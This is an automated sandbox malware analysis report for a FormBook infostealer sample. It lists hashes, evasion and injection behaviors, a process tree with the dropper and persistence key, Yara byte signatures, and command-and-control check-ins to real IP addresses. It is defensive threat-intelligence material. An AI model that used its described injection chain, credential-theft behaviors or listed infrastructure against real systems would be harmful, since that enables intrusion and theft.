Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FS04dlvJrq.exe

Overview

General Information

Sample name:FS04dlvJrq.exe
renamed because original name is a hash value
Original sample name:16b2851cd765c313395a3cba2a38a16d4338ef32bb68e5c13320494b3c84c52a.exe
Analysis ID:1550252
MD5:15227b37f486cb74c7676395a12c9296
SHA1:aef022249d8320d02fc5917813df39ceb7f85205
SHA256:16b2851cd765c313395a3cba2a38a16d4338ef32bb68e5c13320494b3c84c52a
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM autoit script
Yara detected Autoit Injector
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • FS04dlvJrq.exe (PID: 516 cmdline: "C:\Users\user\Desktop\FS04dlvJrq.exe" MD5: 15227B37F486CB74C7676395A12C9296)
    • wscript.exe (PID: 5764 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 2436 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 3224 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 6844 cmdline: "C:\Windows\System32\cmd.exe" /c bpqdpksed.icm vbepwhj.mp3 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bpqdpksed.icm (PID: 5156 cmdline: bpqdpksed.icm vbepwhj.mp3 MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 948 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
            • rmfPfCOHcNt.exe (PID: 3084 cmdline: "C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • EhStorAuthn.exe (PID: 4052 cmdline: "C:\Windows\SysWOW64\EhStorAuthn.exe" MD5: 0C9245FDD67B14B9E7FBEBB88C3A5E7F)
                • rmfPfCOHcNt.exe (PID: 3268 cmdline: "C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • firefox.exe (PID: 3744 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • RegSvcs.exe (PID: 5932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
            • WerFault.exe (PID: 6468 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cmd.exe (PID: 5112 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 5796 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x44e91:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x2cfc0:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2f0a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x171d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        15.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          15.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x163d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          15.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            15.2.RegSvcs.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f0a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x171d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Invoke-Obfuscation CLIP+ Launcher
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 5764, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 2436, ProcessName: cmd.exe
            Sigma detected: Invoke-Obfuscation VAR+ Launcher
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 5764, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 2436, ProcessName: cmd.exe
            Sigma detected: Script Interpreter Execution From Suspicious Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FS04dlvJrq.exe", ParentImage: C:\Users\user\Desktop\FS04dlvJrq.exe, ParentProcessId: 516, ParentProcessName: FS04dlvJrq.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , ProcessId: 5764, ProcessName: wscript.exe
            Sigma detected: Suspicious Script Execution From Temp Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FS04dlvJrq.exe", ParentImage: C:\Users\user\Desktop\FS04dlvJrq.exe, ParentProcessId: 516, ParentProcessName: FS04dlvJrq.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , ProcessId: 5764, ProcessName: wscript.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FS04dlvJrq.exe", ParentImage: C:\Users\user\Desktop\FS04dlvJrq.exe, ParentProcessId: 516, ParentProcessName: FS04dlvJrq.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , ProcessId: 5764, ProcessName: wscript.exe
            Sigma detected: Execution of Suspicious File Type Extension
            Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: bpqdpksed.icm vbepwhj.mp3, CommandLine: bpqdpksed.icm vbepwhj.mp3, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c bpqdpksed.icm vbepwhj.mp3, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6844, ParentProcessName: cmd.exe, ProcessCommandLine: bpqdpksed.icm vbepwhj.mp3, ProcessId: 5156, ProcessName: bpqdpksed.icm
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FS04dlvJrq.exe", ParentImage: C:\Users\user\Desktop\FS04dlvJrq.exe, ParentProcessId: 516, ParentProcessName: FS04dlvJrq.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe" , ProcessId: 5764, ProcessName: wscript.exe
            Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\uhex\BPQDPK~1.EXE C:\Users\user\AppData\Roaming\uhex\vbepwhj.mp3, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm, ProcessId: 5156, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T16:06:09.037540+010020229301A Network Trojan was detected20.12.23.50443192.168.2.649735TCP
            2024-11-06T16:06:47.697936+010020229301A Network Trojan was detected20.12.23.50443192.168.2.649920TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T16:07:04.914090+010028554651A Network Trojan was detected192.168.2.649982216.40.34.4180TCP
            2024-11-06T16:07:28.309362+010028554651A Network Trojan was detected192.168.2.6499883.33.130.19080TCP
            2024-11-06T16:07:43.613704+010028554651A Network Trojan was detected192.168.2.649992192.197.113.6780TCP
            2024-11-06T16:07:57.981805+010028554651A Network Trojan was detected192.168.2.649997162.0.225.21880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-06T16:07:20.691584+010028554641A Network Trojan was detected192.168.2.6499853.33.130.19080TCP
            2024-11-06T16:07:23.239548+010028554641A Network Trojan was detected192.168.2.6499863.33.130.19080TCP
            2024-11-06T16:07:25.780692+010028554641A Network Trojan was detected192.168.2.6499873.33.130.19080TCP
            2024-11-06T16:07:35.957533+010028554641A Network Trojan was detected192.168.2.649989192.197.113.6780TCP
            2024-11-06T16:07:38.551301+010028554641A Network Trojan was detected192.168.2.649990192.197.113.6780TCP
            2024-11-06T16:07:41.229477+010028554641A Network Trojan was detected192.168.2.649991192.197.113.6780TCP
            2024-11-06T16:07:49.679877+010028554641A Network Trojan was detected192.168.2.649994162.0.225.21880TCP
            2024-11-06T16:07:52.263241+010028554641A Network Trojan was detected192.168.2.649995162.0.225.21880TCP
            2024-11-06T16:07:54.832066+010028554641A Network Trojan was detected192.168.2.649996162.0.225.21880TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: FS04dlvJrq.exeReversingLabs: Detection: 47%
            Yara detected FormBook
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: FS04dlvJrq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: FS04dlvJrq.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: FS04dlvJrq.exe
            Source: Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 0000000F.00000002.2646695656.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000002.3356279452.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rmfPfCOHcNt.exe, 00000015.00000002.3356947382.0000000000BBE000.00000002.00000001.01000000.0000000D.sdmp, rmfPfCOHcNt.exe, 00000017.00000000.2725761055.0000000000BBE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.2646917691.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3358640633.00000000045A0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2649299700.00000000043FA000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3358640633.000000000473E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2646727901.0000000004249000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.2646917691.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, EhStorAuthn.exe, 00000016.00000002.3358640633.00000000045A0000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2649299700.00000000043FA000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3358640633.000000000473E000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000003.2646727901.0000000004249000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 0000000F.00000002.2646695656.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000015.00000002.3356279452.0000000000A38000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E6F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00E6F826
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E81630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00E81630
            Source: C:\Users\user\Desktop\FS04dlvJrq.exeCode function: 0_2_00E91FF8 FindFirstFileExA,0_2_00E91FF8
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DCE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,8_2_00DCE387
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DCD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00DCD836
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DCDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_00DCDB69
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DD9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00DD9F9F
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DDA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00DDA0FA
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DDA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_00DDA488
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DD65F1 FindFirstFileW,FindNextFileW,FindClose,8_2_00DD65F1
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00D9C642 FindFirstFileExW,8_2_00D9C642
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DD72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,8_2_00DD72E9
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DD7248 FindFirstFileW,FindClose,8_2_00DD7248
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 22_2_022FC200 FindFirstFileW,FindNextFileW,FindClose,22_2_022FC200
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 4x nop then xor eax, eax22_2_022E9A50
            Source: C:\Windows\SysWOW64\EhStorAuthn.exeCode function: 4x nop then mov ebx, 00000004h22_2_043304DE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49982 -> 216.40.34.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49985 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49991 -> 192.197.113.67:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 192.197.113.67:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49992 -> 192.197.113.67:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49997 -> 162.0.225.218:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49988 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49996 -> 162.0.225.218:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49987 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 162.0.225.218:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 192.197.113.67:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49986 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 162.0.225.218:80
            Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
            Source: Joe Sandbox ViewIP Address: 162.0.225.218 162.0.225.218
            Source: Joe Sandbox ViewASN Name: HKKFGL-AS-APHKKwaifongGroupLimitedHK HKKFGL-AS-APHKKwaifongGroupLimitedHK
            Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
            Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
            Source: Joe Sandbox ViewASN Name: TUCOWSCA TUCOWSCA
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49735
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.6:49920
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icmCode function: 8_2_00DDD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,8_2_00DDD7A1
